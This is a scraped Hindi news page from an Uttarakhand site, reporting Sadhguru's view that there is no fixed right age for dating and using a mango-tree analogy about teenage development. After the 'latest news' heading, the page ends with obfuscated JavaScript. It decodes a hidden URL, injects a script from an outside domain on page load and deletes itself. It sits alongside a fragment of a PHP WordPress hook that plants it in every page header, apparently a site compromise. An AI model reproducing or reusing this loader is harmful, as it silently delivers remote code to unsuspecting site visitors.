Monday, June 24, 2024
Google search engine
Homeउत्तराखंडक्या है गर्लफ्रेंड- बॉयफ्रेंड बनाने की सही उम्र!, सद्गुरु ने बताया कब...

क्या है गर्लफ्रेंड- बॉयफ्रेंड बनाने की सही उम्र!, सद्गुरु ने बताया कब रिश्ते में नहीं आना होगा सही

शादी करने की सही उम्र सरकार ने तय कर रखी है लेकिन प्यार की न तो कोई उम्र होती है और न ही सीमा। प्यार कहीं भी कभी भी, किसी से भी हो सकता है। ज्यादातर रिलेशनशिप की शुरुआत स्कूल, कॉलेज या ऑफिस में होती है लेकिन क्या आप रिलेशनशिप में आने की सही उम्र को जानते हैं। दुनियाभर में सद्गुरु उर्फ जगदीश वासुदेव नाम से फेमस सद्गुरु ने डेटिंग की सही उम्र बताई है, तो चलिए जानते है कि डेटिंग की सही उम्र क्या है।

relationship

एक इवेंट में सद्गुरु उर्फ जगदीश वासुदेव से सवाल किया गया कि रिश्ते में आने की सही उम्र कौन सी है। उस पर सद्गुरु ने कहा कि किसी चीज की कोई तय उम्र नहीं होती है और न ही मैं ये कहने वाला हूं कि आप क्या करें और क्या न करें। जब आपको खुद से रिलेशनशिप में आने की इच्छा हो या जरूरत महसूस हो तो, वो सही समय है। हालांकि किसी तरह के ट्रेंड को फॉलो करना गलत है। आज के युवाओं के बीच काफी फेमस है कि कॉलेज जाने पर डेटिंग करना और गर्लफ्रेंड बनाना जरूरी है लेकिन ये सही नहीं है।

RELATITIONSHIP

सद्गुरु ने आम के पेड़ों का उदाहरण देते हुए कहा कि आम की खेती करने वाला किसान ध्यान रखता है कि पेड़ पर जल्दी से जल्दी फल न आए। ऐसा इसलिए क्योंकि फल आने से पेड़ का विकास रुक जाता है। इसलिए किसान कुछ सालों तक पेड़ की कलियों को तोड़ देता है और फल आने से रोकता है, जिससे उसका ठीक से विकास हो। संपूर्ण विकसित पेड़ अच्छा और फलदार होता है।

ऐसा ही कुछ मनुष्य के साथ होता है।रिश्ते में आने से वो अपनी ऊर्जा को सही जगह नहीं लगा पाते हैं और उनका ठीक से विकास नहीं हो पाता है। 13-15 साल की उम्र मेंं मनुष्य में विकास तेजी से होता है और ऐसे में सभी को अपनी उर्जा सही जगह पर लगानी चाहिए।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>